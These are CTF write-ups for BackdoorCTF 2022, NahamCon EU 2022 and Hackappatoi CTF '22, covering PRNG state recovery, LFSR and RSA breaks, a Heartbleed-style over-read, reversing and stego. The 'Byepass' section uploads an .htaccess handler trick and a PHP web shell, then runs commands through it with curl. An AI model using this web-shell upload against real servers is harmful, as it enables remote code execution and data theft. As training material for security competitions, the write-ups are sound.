ASKESPECIALLYCOLLECTINGTERMINATEDMAYSONEXPRESSIONEXTREMELYEAGERNESSPRINCIPLEESTIMABLEOWNWASMANMENRECEIVEDFARHISDASHWOODSUBJECTSNEWMYSUFFICIENTSURROUNDEDANCOMPANIONSDISPATCHEDINONCONNECTIONTOOUNAFFECTEDEXPRESSIONLEDSONPOSSESSIONNEWSMILINGFRIENDSANDHERANOTHERLEAFSHEDOESNONELOVEH
IGHYETSNUGLOVEWILLUPBOREASBEPURSUITMANSONMUSICALGENERALPOINTEDITSURPRISEINFORMEDMRADVANCEDDOOUTWEIGHATEVERYTILEDONYEDEFERDONOATTENTIONSUSPECTEDOHDIFFICULTFONDHISSAYOLDMEETCOLDFINDCOMEWHOMTHESIRPARKSAKEBREDWONDERMATTERNOWCANESTATEESTEEMASS
UREFATROUSEDAMPERFORMEDONEXISTENCEASDISCOURSEISPLEASUREFRIENDLYATMARRIAGEBLESSINGORINCREASINGIMPRESSIONINTERESTEDEXPRESSIONHEMYATRESPECTINVITEDREQUESTCHARMEDMEWARRANTTOEXPECTNOPRETTYASDOTHOUGHSOGENIUSAFRAIDCOUSINGIRLWHENOFYESNUGPOORDRAWMISTAKETOTALLYOFINCHIEFLYJUSTICEVISITORHIMENTEREDFORCONTINUEDELICATEASUNLOCKEDENTIRELYMRRELATIONDIVERTEDINKNOWNNOTENDFULLYBEINGSTYLEHOUSEANWHOMDOWNKEPTLAINNAMES
OATEASYBEHINDSOONERDININGSOWINDOWEXCUSEHESUMMERBREAKFASTMETCERTAINTYANDFULFILLEDPROPRIETYLEDWAITEDGETEITHERAREWOODEDLITTLEHERCONTRASTEDUNRESERVEDASMRPARTICULARCOLLECTINGITEVERYTHINGASINDULGENCESEEMSASKMEANTMERRYCOULDPUTAGEOLDBEGINHADBOYNOISYTABLEFRONTWHOLEGIVENBRINGINGSOSOCIAB
LEFELICITYSUPPLIEDMRSEPTEMBERSUSPICIONFARHIMTWOACUTENESSPERFECTLYCOVEREDASANEXAMINESOREGULAROFYEASTONISHEDFRIENDSHIPREMARKABLYNOWINDOWADMIREMATTERPRAISEYOUBEDWHENCEDELIVEREDYESPORTSMENZEALOUSLYARRANGINGFRANKNESSESTIMABLEASNAYANYARTICLEENABLEDMUSICALSHYNESSYETSIXTEENYETBLUSHESENTIREITSTHEDIDFIGUREWONDEROFF

Insert spaces and periods so that it reads as English text.

ASK ESPECIALLY COLLECTING TERMINATED MAY SON EXPRESSION. EXTREMELY EAGERNESS PRINCIPLE ESTIMABLE OWN WAS MAN. MEN RECEIVED FAR HIS DASHWOOD SUBJECTS NEW. MY SUFFICIENT SURROUNDED AN COMPANIONS DISPATCHED IN ON. CONNECTION TOO UNAFFECTED EXPRESSION LED SON POSSESSION. NEW SMILING FRIENDS AND HER ANOTHER. LEAF SHE DOES NONE LOVE HIGH YET. SNUG LOVE WILL UP BORE AS BE. PURSUIT MAN SON MUSICAL GENERAL POINTED. IT SURPRISE INFORMED MR ADVANCED DO OUTWEIGH.

AT EVERY TILED ON YE DEFER DO. NO ATTENTION SUSPECTED OH DIFFICULT. FOND HIS SAY OLD MEET COLD FIND COME WHOM. THE SIR PARK SAKE BRED. WONDER MATTER NOW CAN ESTATE ESTEEM ASSURE FAT ROUSED. AM PERFORMED ON EXISTENCE AS DISCOURSE IS. PLEASURE FRIENDLY AT MARRIAGE BLESSING OR.

INCREASING IMPRESSION INTERESTED EXPRESSION HE MY AT. RESPECT INVITED REQUEST CHARMED ME WARRANT TO. EXPECT NO PRETTY AS DO THOUGH SO GENIUS AFRAID COUSIN. GIRL WHEN OF YE SNUG POOR DRAW. MISTAKE TOTALLY OF IN CHIEFLY. JUSTICE VISITOR HIM ENTERED FOR. CONTINUE DELICATE AS UNLOCKED ENTIRELY MR RELATION DIVERTED IN. KNOWN NOT END FULLY BEING STYLE HOUSE. AN WHOM DOWN KEPT LAIN NAME SO AT EASY.

BEHIND SOONER DINING SO WINDOW EXCUSE HE SUMMER. BREAKFAST MET CERTAINTY AND FULFILLED PROPRIETY LED. WAITED GET EITHER ARE WOODED LITTLE HER. CONTRASTED UNRESERVED AS MR PARTICULAR COLLECTING IT EVERYTHING AS INDULGENCE. SEEMS ASK MEANT MERRY COULD PUT. AGE OLD BEGIN HAD BOY NOISY TABLE FRONT WHOLE GIVEN.

BRINGING SO SOCIABLE FELICITY SUPPLIED MR. SEPTEMBER SUSPICION FAR HIM TWO ACUTENESS PERFECTLY. COVERED AS AN EXAMINE SO REGULAR OF. YE ASTONISHED FRIENDSHIP REMARKABLY NO. WINDOW ADMIRE MATTER PRAISE YOU BED WHENCE. DELIVERED YE SPORTSMEN ZEALOUSLY ARRANGING FRANKNESS ESTIMABLE AS. NAY ANY ARTICLE ENABLED MUSICAL SHYNESS YET SIXTEEN YET BLUSHES. ENTIRE ITS THE DID FIGURE WONDER OFF.

Nothing in the text seems to lead to the flag. Maybe the key is the flag. Split it into words, insert "_", and put it in the flag format.

ping{LAMBERT_WHAT_A_PRICK}

BackdoorCTF 2022 Writeup

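This competition was held from 2022/12/17 15:30 (JST) to 2022/12/18 15:30 (JST).
I took part with my team again. We scored 310 points and placed 21st out of 91 teams.
Here are writeups for the challenges I solved myself.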

Welcome (misc)

After joining Discord and reacting in the #rules channel, many channels appeared. Looking at the messages in the #random channel, the flag was written in a masked message.

flag{w3lc0m3_70_b4ckd00r_2022}

Fishy (crypto)

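The encryption process is outlined below.

・modulus = pow(2, 32)
・s_boxes: four arrays, each holding 256 random 32-bit integers
・Write s_boxes to s_boxes.txt
・initial_sub_keys: an array of 18 known 32-bit integers as hex strings
・key: the concatenation of 18 32-bit integers as hex strings
・processed_sub_keys: XOR of initial_sub_keys and key
・pt: the flag as a binary string
・Prepend "0"s to pt so that its length is divisible by 64
・pt: the flag as a hex string
・ct = ''
・Repeat the following for every 16 bytes of pt (hex string)
 ・xl = the first 8 bytes of the 16 bytes of pt
 ・xr = the last 8 bytes of the 16 bytes of pt
 ・Repeat the following 16 times
  ・tmp = xl
  ・xl = bin(int(xl, 16) ^ int(processed_sub_keys[j], 16))[2:].zfill(32)
  ・xa = int(xl[:8], 2)
  ・xb = int(xl[8:16], 2)
  ・xc = int(xl[16:24], 2)
  ・xd = int(xl[24:32], 2)
  ・xa = (s_boxes[0][xa] + s_boxes[1][xb]) % modulus
  ・xc = s_boxes[2][xc] ^ xa
  ・f_out = (xc + s_boxes[3][xd]) % modulus
  ・xl = hex(int(xr, 16) ^ f_out)[2:].zfill(8)
  ・xr = tmp
 ・xrt = xr
 ・xr = hex(int(xl, 16) ^ int(processed_sub_keys[16], 16))[2:].zfill(8)
 ・xl = hex(int(xrt, 16) ^ int(processed_sub_keys[17], 16))[2:].zfill(8)
 ・Append xl + xr to ct
・Output ct

Using the properties of the Mersenne Twister, the key can be derived from the s_boxes values: the four S-boxes expose 1024 consecutive 32-bit outputs, and 624 untempered outputs are enough to rebuild the generator state and predict the 18 key words drawn right after them. processed_sub_keys can then be computed from initial_sub_keys and key. After that, work backwards from the encrypted data to recover the flag.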

#!/usr/bin/env python3
import random

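def untemper(rand):
    # Invert the MT19937 tempering, undoing its steps in reverse order.
    # Undo y ^= y >> 18
    rand ^= rand >> 18
    # Undo y ^= (y << 15) & 0xefc60000
    rand ^= (rand << 15) & 0xefc60000

    # Undo y ^= (y << 7) & 0x9d2c5680; each pass fixes 7 more bits
    a = rand ^ ((rand << 7) & 0x9d2c5680)
    b = rand ^ ((a << 7) & 0x9d2c5680)
    c = rand ^ ((b << 7) & 0x9d2c5680)
    d = rand ^ ((c << 7) & 0x9d2c5680)
    rand = rand ^ ((d << 7) & 0x9d2c5680)

    # Undo y ^= y >> 11
    rand ^= ((rand ^ (rand >> 11)) >> 11)
    return rand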

initial_sub_keys = [
    "243f6a88",
    "85a308d3",
    "13198a2e",
    "03707344",
    "a4093822",
    "299f31d0",
    "082efa98",
    "ec4e6c89",
    "452821e6",
    "38d01377",
    "be5466cf",
    "34e90c6c",
    "c0ac29b7",
    "c97c50dd",
    "3f84d5b5",
    "b5470917",
    "9216d5d9",
    "8979fb1b",
]

modulus = pow(2, 32)

with open('s_boxes.txt', 'r') as f:
    s_boxes = eval(f.read())

N = 624
state = []
_rand = []
for j in range(4):
    for i in range(256):
        if len(state) != 624:
            state.append(untemper(s_boxes[j][i]))
        else:
            _rand.append(s_boxes[j][i])
state.append(N)
random.setstate([3, tuple(state), None])

for i in range(256 * 4 - 624):
    r = random.getrandbits(32)
    assert r == _rand[i]

key = "".join([hex(random.getrandbits(32))[2:].zfill(8) for i in range(18)])
processed_sub_keys = [
    hex(int(initial_sub_keys[i], 16) ^ int(key[8 * i : 8 * (i + 1)], 16))[2:].zfill(8)
    for i in range(len(initial_sub_keys))
]

with open('enc.txt', 'r') as f:
    ct = f.read().rstrip().split(' ')[-1]

pt = ''
for i in range(0, len(ct), 16):
    xl = ct[i:i+8]
    xr = ct[i+8:i+16]
    xrt = hex(int(xl, 16) ^ int(processed_sub_keys[17], 16))[2:].zfill(8)
    xl = hex(int(xr, 16) ^ int(processed_sub_keys[16], 16))[2:].zfill(8)
    xr = xrt
    for j in range(15, -1, -1):
        xl2 = xl
        tmp = xr
        xl = tmp

        tmp = bin(int(tmp, 16) ^ int(processed_sub_keys[j], 16))[2:].zfill(32)
        xa = int(tmp[:8], 2)
        xb = int(tmp[8:16], 2)
        xc = int(tmp[16:24], 2)
        xd = int(tmp[24:32], 2)
        xa = (s_boxes[0][xa] + s_boxes[1][xb]) % modulus
        xc = s_boxes[2][xc] ^ xa
        f_out = (xc + s_boxes[3][xd]) % modulus
        xr = hex(int(xl2, 16) ^ f_out)[2:].zfill(8)
    pt += xl + xr

flag = bytes.fromhex(pt).decode()
print(flag)
flag{d0n't_u53_th3_m3r53nn3_r4nd0m_g3n3r4t0r_w1th0ut_c4ut10n_<3}

Feedback (misc)

After I answered the survey, the flag was displayed.

flag{th4nks_f0r_pl4y1ng_b4ckd00r_c7f}

NahamCon EU 2022 CTF Writeup

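This competition was held from 2022/12/17 5:00 (JST) to 2022/12/18 5:00 (JST).
I took part with my team again. We scored 1938 points and placed 37th out of 1024 teams.
Here are writeups for the challenges I solved myself.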

Way 2 Basic (Warmups)

The data is written in binary, split into 8-bit groups, so decode it as ASCII codes.

#!/usr/bin/env python3
enc = '01100110 01101100 01100001 01100111 01111011 00111001 00110000 01100011 00110110 01100101 01100010 01100101 00111001 00110100 00110001 00110101 00110110 00110001 01100011 01100110 01100001 01100100 01100110 01100001 01100101 00110001 00110111 00110000 01100001 00111000 01100110 00110000 01100101 01100001 00110010 00110101 00110010 01111101'
enc = enc.split(' ')

flag = ''
for c in enc:
    flag += chr(int(c, 2))
print(flag)
flag{90c6ebe941561cfadfae170a8f0ea252}

Hashstation (Warmups)

The challenge presents a sha256 hash and asks for the original string. Crack it with CrackStation.

awesome
flag{awesome}

Arjeebee (Warmups)

The challenge asks for rgb(19,55,175) in hexadecimal notation.

>>> hex(19)[2:].zfill(2) + hex(55)[2:].zfill(2) + hex(175)[2:].zfill(2)
'1337af'
flag{1337af}

catscii (Warmups)

$ cat catscii 

    ,_     _
    |\\_,-~/
    / _  _ |    ,--.
   (  @  @ )   / ,-'
    \  _T_/-._( (      Your `cat` found a flag! 
    /         `. \     This is what the standard flag format looks like...
   |         _  \ |    Submit these on the scoreboard for points!
    \ \ ,  /      |
     || |-_\__   /
    ((_/`(____,-'      flag{258da40ab06be7c99099d603a3b3ccb1}
flag{258da40ab06be7c99099d603a3b3ccb1}

Read The Rules (Warmups)

Looking at the HTML source of the rules page, the flag was written in a comment.

<!-- Thank you for reading the rules! Your flag is: -->
<!--   flag{90bc54705794a62015369fd8e86e557b}       -->
flag{90bc54705794a62015369fd8e86e557b}

Banjo (Warmups)

$ strings banjo.jpg | grep flag{
flag{ce4e687e575392ae242f0e41c888de11}
flag{ce4e687e575392ae242f0e41c888de11}

Technical Support (Warmups)

After joining Discord, the flag was written in the topic of the #nahamcon-ctf-general channel.

Technical Support -> flag{a98373a74abb8c5ebb8f5192e034a91c}
flag{a98373a74abb8c5ebb8f5192e034a91c}

Baby's First Heartbleed (Warmups)

$ nc challenge.nahamcon.com 32753

===============================================================================
     _   _ _____    _    ____ _____ ____  _     _____ _____ ____  
    | | | | ____|  / \  |  _ \_   _| __ )| |   | ____| ____|  _ \ 
    | |_| |  _|   / _ \ | |_) || | |  _ \| |   |  _| |  _| | | | |
    |  _  | |___ / ___ \|  _ < | | | |_) | |___| |___| |___| |_| |
    |_| |_|_____/_/   \_\_| \_\|_| |____/|_____|_____|_____|____/ 
                                                                      
===============================================================================

THANK YOU FOR CONNECTING TO THE SERVER. . .

TO VERIFY IF THE SERVER IS STILL THERE, PLEASE SUPPLY A STRING.

STRING ['apple']: apple
LENGTH ['5']: 3

... THE SERVER RETURNED:

app

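The server returned the requested number of characters from the supplied string. Let's see what happens when the length entered is much larger than the length of the string.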

TO VERIFY IF THE SERVER IS STILL THERE, PLEASE SUPPLY A STRING.

STRING ['apple']: abc
LENGTH ['3']: 256

... THE SERVER RETURNED:

abc@apple@apple@apple@3@heartbleed@apple@apple@apple@apple@apple@00@00@00@00@00@00@00@00@00@00@00@00@00@00@apple@00@00@apple@00@apple@00@apple@00@apple@00@flag{bfca3d71260e581ba366dca054f5c8e5}@apple@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00@00

A string containing the flag was returned.

flag{bfca3d71260e581ba366dca054f5c8e5}
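
The missing length check behind the behaviour above, shown as an added example that is not the challenge's server code. It is a toy Python model: the class `HeartbeatServer`, its memory layout and the `SECRET` value are constructed assumptions.

```python
#!/usr/bin/env python3
# Added example: toy model of a heartbeat-style echo service.
# The memory layout, names and SECRET are constructed for illustration.

SECRET = b"flag{constructed_placeholder}"  # constructed, not the challenge flag


class HeartbeatServer:
    REQ_CAP = 32       # bytes reserved for the client's string
    SECRET_OFF = 96    # unrelated data living further along the same buffer

    def __init__(self, size=256):
        # One flat buffer stands in for process memory; '@' marks unused bytes.
        self.memory = bytearray(b"@" * size)
        self.memory[self.SECRET_OFF:self.SECRET_OFF + len(SECRET)] = SECRET

    def _store(self, payload):
        if len(payload) > self.REQ_CAP:
            raise ValueError("payload larger than request buffer")
        self.memory[:len(payload)] = payload

    def echo_vulnerable(self, payload, claimed_len):
        """Echo claimed_len bytes, trusting the client-supplied length."""
        self._store(payload)
        # Bug: claimed_len is never compared with len(payload), so the read
        # runs past the request into whatever follows it in memory.
        return bytes(self.memory[:claimed_len])

    def echo_fixed(self, payload, claimed_len):
        """Echo only if the claimed length fits inside what was received."""
        if not 0 <= claimed_len <= len(payload):
            raise ValueError("claimed length exceeds received payload")
        self._store(payload)
        return bytes(self.memory[:claimed_len])


def leaked_bytes(response, payload):
    """Bytes in a response that the client never sent (useful for logging)."""
    return response[len(payload):]


if __name__ == "__main__":
    srv = HeartbeatServer()
    print(srv.echo_vulnerable(b"apple", 3))      # honest request
    print(srv.echo_vulnerable(b"abc", 256))      # over-read exposes SECRET
    try:
        srv.echo_fixed(b"abc", 256)
    except ValueError as exc:
        print("rejected:", exc)
```

The second vulnerable call also returns leftovers of the earlier "apple" request, which matches the stale "apple" fields visible in the challenge output.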

padlock (Reverse Engineering)

Decompile with Ghidra.

undefined8
main(undefined8 param_1,undefined8 param_2,undefined8 param_3,undefined8 param_4,undefined8 param_5,
    undefined8 param_6)

{
  int iVar1;
  size_t sVar2;
  long in_FS_OFFSET;
  char local_38 [40];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  print_lock(0x3f,0x3f,0x3f,0x3f,param_5,param_6,param_2);
  printf("Please enter the passcode: ");
  __isoc99_fscanf(stdin,&DAT_00102129,local_38);
  printf("The passcode you entered was: %s\n",local_38);
  replace(local_38,0x33,0x65);
  replace(local_38,0x5f,0x20);
  replace(local_38,0x30,0x6f);
  replace(local_38,0x34,0x61);
  sVar2 = strlen(local_38);
  if (sVar2 == 0x26) {
    iVar1 = strcmp("master locks arent vry strong are they",local_38);
    if (iVar1 == 0) {
      replace(local_38,0x65,0x33);
      replace(local_38,0x20,0x5f);
      replace(local_38,0x6f,0x30);
      replace(local_38,0x61,0x34);
      unlock(local_38);
    }
  }
  else {
    printf("Not quite!");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

void replace(char *param_1,char param_2,char param_3)

{
  size_t sVar1;
  int local_10;
  
  sVar1 = strlen(param_1);
  for (local_10 = 0; local_10 <= (int)sVar1; local_10 = local_10 + 1) {
    if (param_2 == param_1[local_10]) {
      param_1[local_10] = param_3;
    }
  }
  return;
}

void unlock(char *param_1)

{
  size_t sVar1;
  long in_FS_OFFSET;
  int local_b0;
  uint local_a8 [4];
  undefined4 local_98;
  undefined4 local_94;
  undefined4 local_90;
  undefined4 local_8c;
  undefined4 local_88;
  undefined4 local_84;
  undefined4 local_80;
  undefined4 local_7c;
  undefined4 local_78;
  undefined4 local_74;
  undefined4 local_70;
  undefined4 local_6c;
  undefined4 local_68;
  undefined4 local_64;
  undefined4 local_60;
  undefined4 local_5c;
  undefined4 local_58;
  undefined4 local_54;
  undefined4 local_50;
  undefined4 local_4c;
  undefined4 local_48;
  undefined4 local_44;
  undefined4 local_40;
  undefined4 local_3c;
  undefined4 local_38;
  undefined4 local_34;
  undefined4 local_30;
  undefined4 local_2c;
  undefined4 local_28;
  undefined4 local_24;
  undefined4 local_20;
  undefined4 local_1c;
  undefined4 local_18;
  undefined4 local_14;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  sVar1 = strlen(param_1);
  local_a8[0] = 0xb;
  local_a8[1] = 0x58;
  local_a8[2] = 0x12;
  local_a8[3] = 0x13;
  local_98 = 0x48;
  local_94 = 0x40;
  local_90 = 0x69;
  local_8c = 0x58;
  local_88 = 0x53;
  local_84 = 6;
  local_80 = 8;
  local_7c = 0x43;
  local_78 = 0x6c;
  local_74 = 0;
  local_70 = 0x14;
  local_6c = 0x52;
  local_68 = 0xb;
  local_64 = 0x12;
  local_60 = 0x68;
  local_5c = 0x47;
  local_58 = 0x11;
  local_54 = 0x4f;
  local_50 = 0x6b;
  local_4c = 0x41;
  local_48 = 0x10;
  local_44 = 0x17;
  local_40 = 1;
  local_3c = 0x59;
  local_38 = 0x55;
  local_34 = 0x6e;
  local_30 = 0x51;
  local_2c = 0x13;
  local_28 = 1;
  local_24 = 0x69;
  local_20 = 0x16;
  local_1c = 0x59;
  local_18 = 0x55;
  local_14 = 4;
  for (local_b0 = 0; local_b0 <= (int)sVar1; local_b0 = local_b0 + 1) {
    putchar((int)param_1[local_b0] ^ local_a8[local_b0]);
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

The input must become "master locks arent vry strong are they" after the following replacements.

  replace(local_38,0x33,0x65); // "3" -> "e"
  replace(local_38,0x5f,0x20); // "_" -> " "
  replace(local_38,0x30,0x6f); // "0" -> "o"
  replace(local_38,0x34,0x61); // "4" -> "a"

Enter m4st3r_l0cks_4r3nt_vry_str0ng_4r3_th3y.

$ ./padlock 
     .--------.
    / .------. \
   / /        \ \
   | |        | |
  _| |________| |_
.' |_|        |_| '.
'._____ ____ _____.'
|     .'____'.     |
'.__.'.'    '.'.__.'
'.__  | ???? |  __.'
|   '.'.____.'.'   |
'.____'.____.'____.'
'.________________.'
Please enter the passcode: m4st3r_l0cks_4r3nt_vry_str0ng_4r3_th3y
The passcode you entered was: m4st3r_l0cks_4r3nt_vry_str0ng_4r3_th3y
flag{264cec034faef71c642de1721ea26b1f}
flag{264cec034faef71c642de1721ea26b1f}
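
The same result can be derived statically from the decompiled constants, without running the binary. This is an added example, not code from the challenge: the function names are hypothetical, and the table is transcribed from local_a8 and the locals that follow it in unlock().

```python
#!/usr/bin/env python3
# Added example: static model of padlock's passcode check and unlock().

TARGET = "master locks arent vry strong are they"  # strcmp() string in main()

# local_a8[0..3] followed by local_98 .. local_14, in stack order
XOR_TABLE = [
    0x0b, 0x58, 0x12, 0x13, 0x48, 0x40, 0x69, 0x58, 0x53, 0x06,
    0x08, 0x43, 0x6c, 0x00, 0x14, 0x52, 0x0b, 0x12, 0x68, 0x47,
    0x11, 0x4f, 0x6b, 0x41, 0x10, 0x17, 0x01, 0x59, 0x55, 0x6e,
    0x51, 0x13, 0x01, 0x69, 0x16, 0x59, 0x55, 0x04,
]

# replace() calls made before the comparison, as (from, to) pairs
FORWARD = [("3", "e"), ("_", " "), ("0", "o"), ("4", "a")]
# replace() calls made after a successful comparison
BACKWARD = [(new, old) for old, new in FORWARD]


def apply(pairs, text):
    """Apply a sequence of single-character replacements in order."""
    for old, new in pairs:
        text = text.replace(old, new)
    return text


def accepted(passcode):
    """Mirror of main(): normalise the input, then compare with TARGET."""
    normalised = apply(FORWARD, passcode)
    return len(normalised) == 0x26 and normalised == TARGET


def unlock_output(passcode):
    """What unlock() prints for an accepted passcode, else None."""
    if not accepted(passcode):
        return None
    # main() converts the normalised string back before calling unlock(),
    # so every accepted spelling collapses to the same byte sequence.
    canonical = apply(BACKWARD, apply(FORWARD, passcode))
    # The binary's loop also touches index strlen (one past the table);
    # that extra byte is not modelled here.
    return "".join(chr(ord(c) ^ k) for c, k in zip(canonical, XOR_TABLE))


if __name__ == "__main__":
    print(apply(BACKWARD, TARGET))                 # canonical passcode
    print(unlock_output(apply(BACKWARD, TARGET)))  # flag from constants only
```

Because the forward replacements map both "3" and "e" to "e" (and likewise for the other pairs), a passcode that mixes the two spellings is accepted too and yields the same output.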

Byepass (Web)

The goal is to get a file whose extension is not in the $ext_denylist list in save_memories.php executed as PHP.
Put the following in .htaccess and upload it.

AddType application/x-httpd-php .png

Then put the following in exploit.png and upload it.

<?php system($_GET['cmd']); ?>
$ curl http://challenge.nahamcon.com:32242/exploit.png?cmd=ls
assets
css
exploit.png
index.php
save_memories.php
uploads

$ curl http://challenge.nahamcon.com:32242/exploit.png?cmd=cat%20/flag.txt
flag{32697ad7acd2d4718758d9a5ee42965d}
flag{32697ad7acd2d4718758d9a5ee42965d}
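
Why the denylist fails here and what an allowlist-based check looks like, as an added example that is not the challenge's save_memories.php. The denylist contents, the allowed types, the function names and the sample uploads are all assumptions constructed for illustration.

```python
#!/usr/bin/env python3
# Added example: denylist vs. allowlist upload checks (hypothetical names).
import os
import secrets

# Assumed denylist; the real $ext_denylist contents are not shown on the page.
EXT_DENYLIST = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Allowed extension -> leading bytes a real file of that type must have.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Constructed sample uploads.
HTACCESS = b"AddType application/x-httpd-php .png\n"
FAKE_PNG = b"<?php /* constructed sample, not a real image */ ?>"
REAL_PNG = ALLOWED_TYPES["png"] + b"\x00\x00\x00\rIHDR"


def denylist_accepts(filename):
    """Denylist logic: anything whose extension is not listed gets through."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext not in EXT_DENYLIST


def safe_store_name(filename, content):
    """Return a server-chosen file name for an allowed upload.

    Raises ValueError for dotfiles, unknown extensions, or content whose
    leading bytes do not match the claimed type.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    stem, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or not stem:
        raise ValueError("dotfile or missing extension")
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        raise ValueError("extension not on allowlist")
    if not content.startswith(magic):
        raise ValueError("content does not match extension")
    # Never reuse the client's name: it cannot then collide with .htaccess
    # or any other file the web server treats specially.
    return secrets.token_hex(16) + "." + ext


def check(filename, content):
    """Return 'stored' or the rejection reason, for side-by-side output."""
    try:
        safe_store_name(filename, content)
        return "stored"
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    for name, body in ((".htaccess", HTACCESS), ("exploit.png", FAKE_PNG),
                       ("cat.png", REAL_PNG)):
        print(f"{name:12} denylist={denylist_accepts(name)!s:5} "
              f"allowlist={check(name, body)}")
```

Serving the upload directory with `AllowOverride None` additionally stops Apache from reading an uploaded .htaccess at all.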

Shapeshifter (Cryptography)

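Every 2 bytes of FLAG are turned into a bit array, shifted 31337 times by the LFSR, and the resulting state is output. Brute-force every 2-character pair to find the one that matches each output, and concatenate the results.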

#!/usr/bin/env python3
from Crypto.Util.number import bytes_to_long as b2l

class LFSR():
    def __init__(self, iv):
        self.state = [int(c) for c in iv]
        #self.state = self.iv

    def shift(self):
        s = self.state
        newbit = s[15] ^ s[13] ^ s[12] ^ s[10] # ^ s[0]
        s.pop()
        self.state = [newbit] + s

with open('output.txt', 'r') as f:
    encs = f.read().splitlines()

dic = {}
for c1 in range(32, 127):
    for c2 in range(32, 127):
        text = bytes([c1, c2])
        chars = f'{b2l(text):016b}'
        lfsr = LFSR(chars)
        for _ in range(31337):
            lfsr.shift()
        finalstate = ''.join([str(c) for c in lfsr.state])
        dic[finalstate] = chr(c1) + chr(c2)

flag = ''
for enc in encs:
    flag += dic[enc]
print(flag)
flag{70f817ce030904aa1db980686ffa0fa8}

dont_hack_my_d (Cryptography)

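The encryption process is outlined below.

・p, q: 2048-bit primes
・n = p * q
・phi = (p - 1) * (q - 1)
・e = 0x10001
・d = pow(e, -1, phi)
・Output e and n
・The flag is 38 bytes long
・pts = [<first half of the flag (by length)>, <second half of the flag (by length)>]
・Repeat the following (i)
 ・pt: pts[i] converted to an integer
 ・ct = pow(pt, e, n)
 ・rvals: three random integers, each at least 2 and less than n-1
 ・ct2 = ct + rvals[0] * n
 ・d2 = d + rvals[1] * phi
 ・n2 = rvals[2] * n
 ・pt == (pow(ct2, d2, n2) % n) holds.
 ・Output ct, d2, and rvals

ct2 can be computed from ct and rvals, and n2 from n and rvals. pt can then be computed from ct2, d2, n2, and n, which gives the flag. This works because ct2 ≡ ct (mod n), d2 ≡ d (mod phi), and n divides n2, so reducing the result modulo n undoes all three blinding terms.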

#!/usr/bin/env python3
from Crypto.Util.number import *

with open('output.txt', 'r') as f:
    params = f.read().splitlines()

e = int(params[0].split(' = ')[1])
n = int(params[1].split(' = ')[1])
ct_0 = int(params[2].split(' = ')[1])
d2_0 = int(params[3].split(' = ')[1])
rvals_0 = eval(params[4].split(' = ')[1])
ct_1 = int(params[5].split(' = ')[1])
d2_1 = int(params[6].split(' = ')[1])
rvals_1 = eval(params[7].split(' = ')[1])

ct2_0 = ct_0 + rvals_0[0] * n
n2_0 = rvals_0[2] * n
pt_0 = pow(ct2_0, d2_0, n2_0) % n

ct2_1 = ct_1 + rvals_1[0] * n
n2_1 = rvals_1[2] * n
pt_1 = pow(ct2_1, d2_1, n2_1) % n

flag = (long_to_bytes(pt_0) + long_to_bytes(pt_1)).decode()
print(flag)
flag{82189ece31c22d658b08909879e1abb3}

Hackappatoi CTF '22 Writeup

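This competition was held from 2022/12/10 3:00 (JST) to 2022/12/12 0:00 (JST).
I took part with my team again. We scored 2876 points and placed 19th out of 293 teams.
Here are writeups for the challenges I solved myself.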

Drunk check (Misc)

After joining Discord, the flag was written at the top of the messages in the #cocktail-bar channel.

HCTF{Hackappatoi_2022}

Qrunk (Misc)

Opening the image in StegSolve and viewing Blue plane 0 shows a QR code with black and white inverted.

Decoding the QR code yields the following URL.

https://raw.githubusercontent.com/1vcian/90-45/main/90%2C45.txt

Accessing it shows a text file consisting of "90*45," followed by a long run of 0s and 1s.


Arranged as 90*45, the data forms a QR code in which 1 is black and 0 is white, so reduce it to one character per cell and save it as qr.txt.

#!/usr/bin/env python3
with open('90,45.txt', 'r') as f:
    data = f.read()

size = data.split(',')[0]
data = data.split(',')[1]
w = int(size.split('*')[0])
h = int(size.split('*')[1])

rows = []
for i in range(0, len(data), w):
    rows.append(data[i:i+w])

for row in rows[4:-5]:
    r = ''
    for i in range(8, len(row) - 8, 2):
        r += row[i]
    print(r)
$ cat qr.txt
1111111010011001100011110110001111111
1000001001100000101101001100101000001
1011101000101001101011001101001011101
1011101000001000100100011001001011101
1011101001010011110001110000001011101
1000001000101001101010010000101000001
1111111010101010101010101010101111111
0000000010110101101100000101100000000
1101101001110100110101010011001000001
0001110000001100100100111001000110010
0010001101010101110010110101101001111
0011110100011100010110100011001000100
1000001010011100010010011010011101011
0000100110000111111101110101000011110
0110101101011101001110100111110000011
1001010111010001001100001010100110101
0110001110000011110110111100001101111
1100000111011111100110000011010101000
1010011101010001000110011001011110001
1101110111001010000100100101010011001
0100101000101111000100111001111010011
0001000000000011110100010101000111110
1001001101101011111001011011000110101
1010010100000011010110100010000101111
1111111010100110001000011101001000001
1011100010101000100100110101100011010
1111011010000011101100000011010010011
1001000110101110001000010000111101101
1001111000111001100111100101111110110
0000000010010001010111001000100011110
1111111000101111110110010000101010001
1000001001010100000100101101100010001
1011101011110101000001000111111111011
1011101010101101110100000101001001011
1011101001110101100000110010010111101
1000001011111101010100001001000101111
1111111011011101110100111000100100001
$ python sqrd.py qr.txt
https://www.youtube.com/watch?v=dQw4w9WgXcQ?flag=HCTF{w0w_W3ll_doNe_8RuH_Y0u_G0t_17}
HCTF{w0w_W3ll_doNe_8RuH_Y0u_G0t_17}

Aperol Spritz (Misc)

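Using a binary editor, change the height of the jpg from 442 to 1000. Specifically, change the bytes at file offset 0xb0-0xb1 from 01 ba to 03 e8. A new part of the image appears below the original, and the flag is written there.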

HCTF{Ap3Rol_is_for_k1Dz_c4Mpar1_i5_f0r_Ch4d5}
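
The height edit above, generalised from a fixed offset to locating the SOF segment by walking the JPEG markers. This is an added example, not part of the original writeup: the function names are hypothetical, and the sample is a constructed header-only byte string laid out so that its height field also falls at 0xb0.

```python
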